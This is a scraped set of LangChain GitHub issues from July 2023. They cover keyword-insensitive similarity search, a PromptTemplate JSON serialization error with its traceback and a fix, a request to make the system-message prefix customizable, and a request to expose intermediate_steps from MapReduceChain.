I've tried every open source VectorStore I could find (FAISS, Chrome, Annoy, DocArray, Qdrant, scikit-learn, etc), they all returned the exact same list.
I also tried making everything lowercase (it did help with other queries, here it didn't).
I also tried with relevancy score (getting 10x as many and sorting myself), which did help in other cases, but not here.
Any suggestion is welcome, especially if the error is on my side.
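One suggestion, hedged: dense embeddings rank by overall semantic similarity, so an exact keyword hit on "rules" can be outweighed by the many privacy-themed sentences. A sketch that mixes lexical and dense retrieval, assuming `BM25Retriever` and `EnsembleRetriever` are available in this LangChain version (`rank_bm25` must be installed):

```python
from langchain.embeddings import OpenAIEmbeddings
from langchain.retrievers import BM25Retriever, EnsembleRetriever
from langchain.vectorstores import FAISS

bm25 = BM25Retriever.from_documents(facts_docs)
bm25.k = 10
dense = FAISS.from_documents(facts_docs, OpenAIEmbeddings()).as_retriever(search_kwargs={"k": 10})

hybrid = EnsembleRetriever(retrievers=[bm25, dense], weights=[0.5, 0.5])
docs = hybrid.get_relevant_documents(target_query)
```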
Thanks! | Similarity search returns random docs, not the ones that contain the specified keywords | https://api.github.com/repos/langchain-ai/langchain/issues/7427/comments | 9 | 2023-07-09T12:31:36Z | 2023-10-14T20:41:00Z | https://github.com/langchain-ai/langchain/issues/7427 | 1,795,381,432 | 7,427 |
[
"hwchase17",
"langchain"
]
| ### System Info
---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
Cell In[15], line 15
12 qa = RetrievalQA(combine_documents_chain=qa_chain, retriever=retriever.as_retriever())
14 query = "halo"
---> 15 qa.run(query)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:440, in Chain.run(self, callbacks, tags, metadata, *args, **kwargs)
438 if len(args) != 1:
439 raise ValueError("`run` supports only one positional argument.")
--> 440 return self(args[0], callbacks=callbacks, tags=tags, metadata=metadata)[
441 _output_key
442 ]
444 if kwargs and not args:
445 return self(kwargs, callbacks=callbacks, tags=tags, metadata=metadata)[
446 _output_key
447 ]
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:243, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
--> 243 raise e
244 run_manager.on_chain_end(outputs)
245 final_outputs: Dict[str, Any] = self.prep_outputs(
246 inputs, outputs, return_only_outputs
247 )
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:237, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
231 run_manager = callback_manager.on_chain_start(
232 dumpd(self),
233 inputs,
234 )
235 try:
236 outputs = (
--> 237 self._call(inputs, run_manager=run_manager)
238 if new_arg_supported
239 else self._call(inputs)
240 )
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/retrieval_qa/base.py:131, in BaseRetrievalQA._call(self, inputs, run_manager)
129 else:
130 docs = self._get_docs(question) # type: ignore[call-arg]
--> 131 answer = self.combine_documents_chain.run(
132 input_documents=docs, question=question, callbacks=_run_manager.get_child()
133 )
135 if self.return_source_documents:
136 return {self.output_key: answer, "source_documents": docs}
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:445, in Chain.run(self, callbacks, tags, metadata, *args, **kwargs)
440 return self(args[0], callbacks=callbacks, tags=tags, metadata=metadata)[
441 _output_key
442 ]
444 if kwargs and not args:
--> 445 return self(kwargs, callbacks=callbacks, tags=tags, metadata=metadata)[
446 _output_key
447 ]
449 if not kwargs and not args:
450 raise ValueError(
451 "`run` supported with either positional arguments or keyword arguments,"
452 " but none were provided."
453 )
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:243, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
--> 243 raise e
244 run_manager.on_chain_end(outputs)
245 final_outputs: Dict[str, Any] = self.prep_outputs(
246 inputs, outputs, return_only_outputs
247 )
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:237, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
231 run_manager = callback_manager.on_chain_start(
232 dumpd(self),
233 inputs,
234 )
235 try:
236 outputs = (
--> 237 self._call(inputs, run_manager=run_manager)
238 if new_arg_supported
239 else self._call(inputs)
240 )
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/combine_documents/base.py:106, in BaseCombineDocumentsChain._call(self, inputs, run_manager)
104 # Other keys are assumed to be needed for LLM prediction
105 other_keys = {k: v for k, v in inputs.items() if k != self.input_key}
--> 106 output, extra_return_dict = self.combine_docs(
107 docs, callbacks=_run_manager.get_child(), **other_keys
108 )
109 extra_return_dict[self.output_key] = output
110 return extra_return_dict
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/combine_documents/stuff.py:165, in StuffDocumentsChain.combine_docs(self, docs, callbacks, **kwargs)
163 inputs = self._get_inputs(docs, **kwargs)
164 # Call predict on the LLM.
--> 165 return self.llm_chain.predict(callbacks=callbacks, **inputs), {}
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/llm.py:252, in LLMChain.predict(self, callbacks, **kwargs)
237 def predict(self, callbacks: Callbacks = None, **kwargs: Any) -> str:
238 """Format prompt with kwargs and pass to LLM.
239
240 Args:
(...)
250 completion = llm.predict(adjective="funny")
251 """
--> 252 return self(kwargs, callbacks=callbacks)[self.output_key]
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:243, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
--> 243 raise e
244 run_manager.on_chain_end(outputs)
245 final_outputs: Dict[str, Any] = self.prep_outputs(
246 inputs, outputs, return_only_outputs
247 )
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:237, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
231 run_manager = callback_manager.on_chain_start(
232 dumpd(self),
233 inputs,
234 )
235 try:
236 outputs = (
--> 237 self._call(inputs, run_manager=run_manager)
238 if new_arg_supported
239 else self._call(inputs)
240 )
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/llm.py:92, in LLMChain._call(self, inputs, run_manager)
87 def _call(
88 self,
89 inputs: Dict[str, Any],
90 run_manager: Optional[CallbackManagerForChainRun] = None,
91 ) -> Dict[str, str]:
---> 92 response = self.generate([inputs], run_manager=run_manager)
93 return self.create_outputs(response)[0]
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/llm.py:102, in LLMChain.generate(self, input_list, run_manager)
100 """Generate LLM result from inputs."""
101 prompts, stop = self.prep_prompts(input_list, run_manager=run_manager)
--> 102 return self.llm.generate_prompt(
103 prompts,
104 stop,
105 callbacks=run_manager.get_child() if run_manager else None,
106 **self.llm_kwargs,
107 )
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/base.py:230, in BaseChatModel.generate_prompt(self, prompts, stop, callbacks, **kwargs)
222 def generate_prompt(
223 self,
224 prompts: List[PromptValue],
(...)
227 **kwargs: Any,
228 ) -> LLMResult:
229 prompt_messages = [p.to_messages() for p in prompts]
--> 230 return self.generate(prompt_messages, stop=stop, callbacks=callbacks, **kwargs)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/base.py:125, in BaseChatModel.generate(self, messages, stop, callbacks, tags, metadata, **kwargs)
123 if run_managers:
124 run_managers[i].on_llm_error(e)
--> 125 raise e
126 flattened_outputs = [
127 LLMResult(generations=[res.generations], llm_output=res.llm_output)
128 for res in results
129 ]
130 llm_output = self._combine_llm_outputs([res.llm_output for res in results])
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/base.py:115, in BaseChatModel.generate(self, messages, stop, callbacks, tags, metadata, **kwargs)
112 for i, m in enumerate(messages):
113 try:
114 results.append(
--> 115 self._generate_with_cache(
116 m,
117 stop=stop,
118 run_manager=run_managers[i] if run_managers else None,
119 **kwargs,
120 )
121 )
122 except (KeyboardInterrupt, Exception) as e:
123 if run_managers:
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/base.py:262, in BaseChatModel._generate_with_cache(self, messages, stop, run_manager, **kwargs)
258 raise ValueError(
259 "Asked to cache, but no cache found at `langchain.cache`."
260 )
261 if new_arg_supported:
--> 262 return self._generate(
263 messages, stop=stop, run_manager=run_manager, **kwargs
264 )
265 else:
266 return self._generate(messages, stop=stop, **kwargs)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/openai.py:371, in ChatOpenAI._generate(self, messages, stop, run_manager, **kwargs)
363 message = _convert_dict_to_message(
364 {
365 "content": inner_completion,
(...)
368 }
369 )
370 return ChatResult(generations=[ChatGeneration(message=message)])
--> 371 response = self.completion_with_retry(messages=message_dicts, **params)
372 return self._create_chat_result(response)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/openai.py:319, in ChatOpenAI.completion_with_retry(self, **kwargs)
315 @retry_decorator
316 def _completion_with_retry(**kwargs: Any) -> Any:
317 return self.client.create(**kwargs)
--> 319 return _completion_with_retry(**kwargs)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/tenacity/__init__.py:289, in BaseRetrying.wraps.<locals>.wrapped_f(*args, **kw)
287 @functools.wraps(f)
288 def wrapped_f(*args: t.Any, **kw: t.Any) -> t.Any:
--> 289 return self(f, *args, **kw)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/tenacity/__init__.py:379, in Retrying.__call__(self, fn, *args, **kwargs)
377 retry_state = RetryCallState(retry_object=self, fn=fn, args=args, kwargs=kwargs)
378 while True:
--> 379 do = self.iter(retry_state=retry_state)
380 if isinstance(do, DoAttempt):
381 try:
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/tenacity/__init__.py:314, in BaseRetrying.iter(self, retry_state)
312 is_explicit_retry = fut.failed and isinstance(fut.exception(), TryAgain)
313 if not (is_explicit_retry or self.retry(retry_state)):
--> 314 return fut.result()
316 if self.after is not None:
317 self.after(retry_state)
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/concurrent/futures/_base.py:438, in Future.result(self, timeout)
436 raise CancelledError()
437 elif self._state == FINISHED:
--> 438 return self.__get_result()
440 self._condition.wait(timeout)
442 if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/concurrent/futures/_base.py:390, in Future.__get_result(self)
388 if self._exception:
389 try:
--> 390 raise self._exception
391 finally:
392 # Break a reference cycle with the exception in self._exception
393 self = None
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/tenacity/__init__.py:382, in Retrying.__call__(self, fn, *args, **kwargs)
380 if isinstance(do, DoAttempt):
381 try:
--> 382 result = fn(*args, **kwargs)
383 except BaseException: # noqa: B902
384 retry_state.set_exception(sys.exc_info()) # type: ignore[arg-type]
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/openai.py:317, in ChatOpenAI.completion_with_retry.<locals>._completion_with_retry(**kwargs)
315 @retry_decorator
316 def _completion_with_retry(**kwargs: Any) -> Any:
--> 317 return self.client.create(**kwargs)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/openai/api_resources/chat_completion.py:25, in ChatCompletion.create(cls, *args, **kwargs)
23 while True:
24 try:
---> 25 return super().create(*args, **kwargs)
26 except TryAgain as e:
27 if timeout is not None and time.time() > start + timeout:
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/openai/api_resources/abstract/engine_api_resource.py:153, in EngineAPIResource.create(cls, api_key, api_base, api_type, request_id, api_version, organization, **params)
127 @classmethod
128 def create(
129 cls,
(...)
136 **params,
137 ):
138 (
139 deployment_id,
140 engine,
(...)
150 api_key, api_base, api_type, api_version, organization, **params
151 )
--> 153 response, _, api_key = requestor.request(
154 "post",
155 url,
156 params=params,
157 headers=headers,
158 stream=stream,
159 request_id=request_id,
160 request_timeout=request_timeout,
161 )
163 if stream:
164 # must be an iterator
165 assert not isinstance(response, OpenAIResponse)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/openai/api_requestor.py:288, in APIRequestor.request(self, method, url, params, headers, files, stream, request_id, request_timeout)
277 def request(
278 self,
279 method,
(...)
286 request_timeout: Optional[Union[float, Tuple[float, float]]] = None,
287 ) -> Tuple[Union[OpenAIResponse, Iterator[OpenAIResponse]], bool, str]:
--> 288 result = self.request_raw(
289 method.lower(),
290 url,
291 params=params,
292 supplied_headers=headers,
293 files=files,
294 stream=stream,
295 request_id=request_id,
296 request_timeout=request_timeout,
297 )
298 resp, got_stream = self._interpret_response(result, stream)
299 return resp, got_stream, self.api_key
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/openai/api_requestor.py:581, in APIRequestor.request_raw(self, method, url, params, supplied_headers, files, stream, request_id, request_timeout)
569 def request_raw(
570 self,
571 method,
(...)
579 request_timeout: Optional[Union[float, Tuple[float, float]]] = None,
580 ) -> requests.Response:
--> 581 abs_url, headers, data = self._prepare_request_raw(
582 url, supplied_headers, method, params, files, request_id
583 )
585 if not hasattr(_thread_context, "session"):
586 _thread_context.session = _make_session()
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/openai/api_requestor.py:553, in APIRequestor._prepare_request_raw(self, url, supplied_headers, method, params, files, request_id)
551 data = params
552 if params and not files:
--> 553 data = json.dumps(params).encode()
554 headers["Content-Type"] = "application/json"
555 else:
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/json/__init__.py:231, in dumps(obj, skipkeys, ensure_ascii, check_circular, allow_nan, cls, indent, separators, default, sort_keys, **kw)
226 # cached encoder
227 if (not skipkeys and ensure_ascii and
228 check_circular and allow_nan and
229 cls is None and indent is None and separators is None and
230 default is None and not sort_keys and not kw):
--> 231 return _default_encoder.encode(obj)
232 if cls is None:
233 cls = JSONEncoder
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/json/encoder.py:199, in JSONEncoder.encode(self, o)
195 return encode_basestring(o)
196 # This doesn't pass the iterator directly to ''.join() because the
197 # exceptions aren't as detailed. The list call should be roughly
198 # equivalent to the PySequence_Fast that ''.join() would do.
--> 199 chunks = self.iterencode(o, _one_shot=True)
200 if not isinstance(chunks, (list, tuple)):
201 chunks = list(chunks)
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/json/encoder.py:257, in JSONEncoder.iterencode(self, o, _one_shot)
252 else:
253 _iterencode = _make_iterencode(
254 markers, self.default, _encoder, self.indent, floatstr,
255 self.key_separator, self.item_separator, self.sort_keys,
256 self.skipkeys, _one_shot)
--> 257 return _iterencode(o, 0)
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/json/encoder.py:179, in JSONEncoder.default(self, o)
160 def default(self, o):
161 """Implement this method in a subclass such that it returns
162 a serializable object for ``o``, or calls the base implementation
163 (to raise a ``TypeError``).
(...)
177
178 """
--> 179 raise TypeError(f'Object of type {o.__class__.__name__} '
180 f'is not JSON serializable')
TypeError: Object of type PromptTemplate is not JSON serializable
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
from langchain.prompts import PromptTemplate
from langchain.chat_models import ChatOpenAI
from langchain.chains import RetrievalQA
from langchain.chains.question_answering import load_qa_chain

prompt_template = """Use the following pieces of context to answer the question at the end. If you don't know the answer, just say that you don't know, don't try to make up an answer.
Question: {question}
Answer in Italian:"""
PROMPT = PromptTemplate(template=prompt_template, input_variables=["question"])

chain_type_kwargs = {"prompt": PROMPT}
# Passing the PromptTemplate through model_kwargs is what triggers the error:
# everything in model_kwargs is JSON-serialized into the OpenAI request body.
llm = ChatOpenAI(model_name="gpt-3.5-turbo", temperature=0, model_kwargs=chain_type_kwargs)
qa_chain = load_qa_chain(llm=llm, chain_type="stuff", verbose=True)
# `retriever` is an existing vector store created earlier.
qa = RetrievalQA(combine_documents_chain=qa_chain, retriever=retriever.as_retriever())
query = "halo"
qa.run(query)
```
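For reference, a minimal sketch of the likely fix: the prompt belongs in the chain's `chain_type_kwargs`, not in the model's `model_kwargs`, because `model_kwargs` are JSON-serialized into the OpenAI request (the failing `json.dumps(params)` frame above). This is only a sketch; it reuses the `retriever` vector store from the snippet and adds a `{context}` variable, which the "stuff" chain needs in order to insert the retrieved documents.

```python
from langchain.prompts import PromptTemplate
from langchain.chat_models import ChatOpenAI
from langchain.chains import RetrievalQA

# The "stuff" chain fills {context} with the retrieved documents,
# so the prompt needs both variables.
prompt_template = """Use the following pieces of context to answer the question at the end. If you don't know the answer, just say that you don't know, don't try to make up an answer.

{context}

Question: {question}
Answer in Italian:"""
PROMPT = PromptTemplate(template=prompt_template, input_variables=["context", "question"])

llm = ChatOpenAI(model_name="gpt-3.5-turbo", temperature=0)  # no PromptTemplate in model_kwargs
qa = RetrievalQA.from_chain_type(
    llm=llm,
    chain_type="stuff",
    retriever=retriever.as_retriever(),  # same vector store object as in the snippet above
    chain_type_kwargs={"prompt": PROMPT},
)
qa.run("halo")
```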
### Expected behavior
I expect to be able to use a custom PromptTemplate with a RetrievalQA chain. | TypeError: Object of type PromptTemplate is not JSON serializable | https://api.github.com/repos/langchain-ai/langchain/issues/7426/comments | 2 | 2023-07-09T10:02:36Z | 2023-10-15T16:04:53Z | https://github.com/langchain-ai/langchain/issues/7426 | 1,795,324,312 | 7,426
[
"hwchase17",
"langchain"
]
| ### Feature request
We are using langchain for non-English applications. In `get_buffer_string`, the prefix for system messages is hardcoded as "System":
```python
for m in messages:
    if isinstance(m, HumanMessage):
        role = human_prefix
    elif isinstance(m, AIMessage):
        role = ai_prefix
    elif isinstance(m, SystemMessage):
        role = "System"
    elif isinstance(m, FunctionMessage):
        role = "Function"
    elif isinstance(m, ChatMessage):
        role = m.role
    else:
        raise ValueError(f"Got unsupported message type: {m}")
```
The word "System" will appear in the prompt, e.g., when using summary-based memories. A sudden English word is not friendly to non-English LLMs.
### Motivation
Improving multi-language support.
### Your contribution
Sorry, I am probably not capable of implementing this in langchain myself. | Can you make system_prefix customizable? | https://api.github.com/repos/langchain-ai/langchain/issues/7415/comments | 1 | 2023-07-08T22:26:17Z | 2023-10-14T20:09:47Z | https://github.com/langchain-ai/langchain/issues/7415 | 1,795,149,831 | 7,415
[
"hwchase17",
"langchain"
]
| ### Feature request
Pipe `intermediate_steps` out of the MapReduce chain:
```python
# Combining documents by mapping a chain over them, then combining results
combine_documents = MapReduceDocumentsChain(
    # Map chain
    llm_chain=map_llm_chain,
    # Reduce chain
    reduce_documents_chain=reduce_documents_chain,
    # The variable name in the llm_chain to put the documents in
    document_variable_name="questions",
    # Return the results of the map steps in the output
    return_intermediate_steps=True,
)

# Define the Map-Reduce chain
map_reduce = MapReduceChain(
    # Chain to combine documents
    combine_documents_chain=combine_documents,
    # Splitter to use for initial split
    text_splitter=text_splitter,
)

return map_reduce.run(input_text=input_doc)
```
Error:
```
ValueError: `run` not supported when there is not exactly one output key. Got ['output_text', 'intermediate_steps'].
```
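A possible workaround until this is supported, sketched under the assumption that `MapReduceChain` itself calls `.run()` on the combine chain internally (so the wrapper has to be bypassed): split the text manually and invoke the combine-documents chain with the dict-style call, which returns every output key instead of exactly one.

```python
from langchain.docstore.document import Document

# Split the input ourselves, then call the combine chain directly; calling a
# chain as a function returns the full output dict rather than a single value.
texts = text_splitter.split_text(input_doc)
docs = [Document(page_content=t) for t in texts]

result = combine_documents({"input_documents": docs})
final_output = result["output_text"]
map_results = result["intermediate_steps"]  # per-chunk outputs of the map step
```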
### Motivation
We want to return the intermediate map results (the per-document outputs) alongside the final combined output.
### Your contribution
Will work on this | Pipe `intermediate_steps` out of map_reduce.run() | https://api.github.com/repos/langchain-ai/langchain/issues/7412/comments | 4 | 2023-07-08T19:14:30Z | 2024-02-09T16:25:54Z | https://github.com/langchain-ai/langchain/issues/7412 | 1,795,070,373 | 7,412 |